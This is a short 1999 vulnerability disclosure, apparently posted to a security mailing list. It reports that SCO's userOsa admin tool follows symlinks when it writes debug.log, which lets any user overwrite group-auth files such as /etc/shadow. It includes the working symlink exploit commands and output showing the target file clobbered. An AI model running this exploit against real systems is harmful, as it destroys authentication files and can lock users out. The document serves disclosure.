Greetings, Any user may overwrite any file with group auth (i.e. /etc/shadow, /etc/passwd) using /etc/sysadm.d/bin/userOsa. Note that this will not change the permissions of the file or allow for the user to input a passwd entry string into these files, it will simply clobber the contents of the file with debug output. When userOsa recieves invalid input, it generates a log file called "debug.log" in the PWD. This file is created with group auth permissions,does not check for this file's existence, and will follow symlinks. Thus the exploit is as follows: scohack:/tmp$ ln -s /etc/shadow.old debug.log scohack:/tmp$ /etc/sysadm.d/bin/userOsa bah connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}} Failed to listen to client Failure in making connection to OSA. scohack:/tmp$ ----- BEFORE EXPLOIT: scohack:/# l /etc/shadow.old -rw-rw---- 1 root auth 26 Oct 11 20:08 /etc/shadow.old AFTER EXPLOIT (note the file size): scohack:/# l /etc/shadow.old -rw-rw---- 1 root auth 177 Oct 11 20:10 /etc/shadow.old scohack:/# cat /etc/shadow.old >>> Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by <<< SendConnectFail(connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}}) scohack:/# Brock Tellier UNIX Systems Administrator